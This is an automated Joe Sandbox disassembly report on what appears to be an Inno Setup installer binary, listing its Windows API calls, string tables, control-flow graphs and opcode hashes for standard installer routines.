                                                                                                                                        • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                                                                        • API String ID: 3391052094-3342197833
                                                                                                                                        • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                                                        • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                                                                        • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                                                        • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                                                                         Control-flow Graph

                                                                                                                                         • Function start: 00492848 (graph image not recoverable; basic-block edge list omitted. The graph is a string-compare dispatch whose branches reach Sleep, FindWindowA, SendMessageA, PostMessageA, SendNotifyMessageA, RegisterClipboardFormatA, GetProcAddress, GetLastError, FreeLibrary, CreateMutexA, OemToCharBuffA and CharToOemBuffA)
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                                                                        • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindSleepWindow
                                                                                                                                        • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                                                        • API String ID: 3078808852-3310373309
                                                                                                                                        • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                                                        • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                                                                        • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                                                        • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

                                                                                                                                         Control-flow Graph

                                                                                                                                         • Function start: 00483A7C (graph image not recoverable; basic-block edge list omitted. The graph covers the GetModuleHandleA / GetProcAddress lookups, GetNativeSystemInfo, GetCurrentProcess and the GetSystemInfo fallback)
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                                                        • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                                                        • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                                                        • API String ID: 2230631259-2623177817
                                                                                                                                        • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                                                        • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                                                                        • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                                                        • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                                                                         Control-flow Graph

                                                                                                                                         • Function start: 00468D88 (graph image not recoverable; basic-block edge list omitted. The graph ends at the RegCloseKey call, block 468f7a-468f90)
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                                                                        Strings
                                                                                                                                        • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                                                                        • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                                                                        • Inno Setup: No Icons, xrefs: 00468E73
                                                                                                                                        • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                                                                        • Inno Setup: App Path, xrefs: 00468E4A
                                                                                                                                        • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                                                                        • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                                                                        • %s\%s_is1, xrefs: 00468E05
                                                                                                                                        • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                                                                        • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                                                                        • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                                                                        • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                        • API String ID: 47109696-1093091907
                                                                                                                                        • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                                                        • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                                                                        • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                                                        • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

Control-flow Graph

APIs
  • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
  • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
• SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
• CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
  • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
• String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
• API String ID: 3771764029-544719455
• Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
• Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
• Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
• Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

Control-flow Graph

control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1960 4238f1 1958->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1961 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
APIs
  • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
• GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
• RegisterClassA.USER32(00499630), ref: 004238B7
• GetSystemMetrics.USER32(00000000), ref: 004238D9
• GetSystemMetrics.USER32(00000001), ref: 004238E8
• SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
• SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
• GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
• DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
• DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
• String ID: |6B
• API String ID: 183575631-3009739247
• Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
• Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
• Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
• Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

Control-flow Graph

control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1997 47cefb-47cf01 1994->1997 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1997->1991 1997->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
APIs
• GetProcAddress.KERNEL32(74350000,SHGetFolderPathA), ref: 0047CF7A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
• API String ID: 190572456-256906917
• Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
• Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
• Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
• Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

Control-flow Graph

control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressProc$HandleModulePolicyProcess
• String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
• API String ID: 3256987805-3653653586
• Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
• Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
• Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
• Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
APIs
• SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
• GetWindowLongA.USER32(?,000000F0), ref: 0041366F
• GetWindowLongA.USER32(?,000000F4), ref: 00413681
• SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
• SetPropA.USER32(?,00000000,00000000), ref: 004136AB
• SetPropA.USER32(?,00000000,00000000), ref: 004136C2
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: LongWindow$Prop
• String ID: 3A$yA
• API String ID: 3887896539-3278460822
• Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
• Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
• Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
• Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

Control-flow Graph

                                                                                                                                        control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2915 4672d0-4672da call 47d33c 2910->2915 2916 4672df-4672e3 2910->2916 2915->2916 2919 4672e5-467308 call 403738 SHGetFileInfo 2916->2919 2920 46733d-467371 call 403400 * 2 2916->2920 2919->2920 2928 46730a-467311 2919->2928 2928->2920 2931 467313-467338 ExtractIconA call 4670c0 2928->2931 2931->2920 2932->2920
APIs
• SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
  • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
  • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
• ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
• SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Icon$Extract$FileInfo$CursorDestroyDraw
• String ID: c:\directory$shell32.dll$%H
• API String ID: 3376378930-166502273

APIs
• GetActiveWindow.USER32 ref: 0042F58F
• GetFocus.USER32 ref: 0042F597
• RegisterClassA.USER32(004997AC), ref: 0042F5B8
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
• ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
• SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
Similarity
• API ID: Window$CreateFocus$ActiveClassRegisterShow
• String ID: TWindowDisabler-Window
• API String ID: 3167913817-1824977358

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113

APIs
• RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
• RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
• GetCurrentThreadId.KERNEL32 ref: 00430971
• GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
Similarity
• API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
• String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
• API String ID: 4130936913-2943970505

APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
  • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
  • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
  • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
  • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
Similarity
• API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
• String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
• API String ID: 854858120-615399546

APIs
• LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
• GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
• OemToCharA.USER32(?,?), ref: 0042375C
• CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
Similarity
• API ID: Char$FileIconLoadLowerModuleName
• String ID: 2$MAINICON
• API String ID: 3935243913-3181700818
APIs
• GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
• GetCurrentThreadId.KERNEL32 ref: 00418F79
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
  • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
  • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
  • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
  • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
  • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
  • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
  • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
  • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
  • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
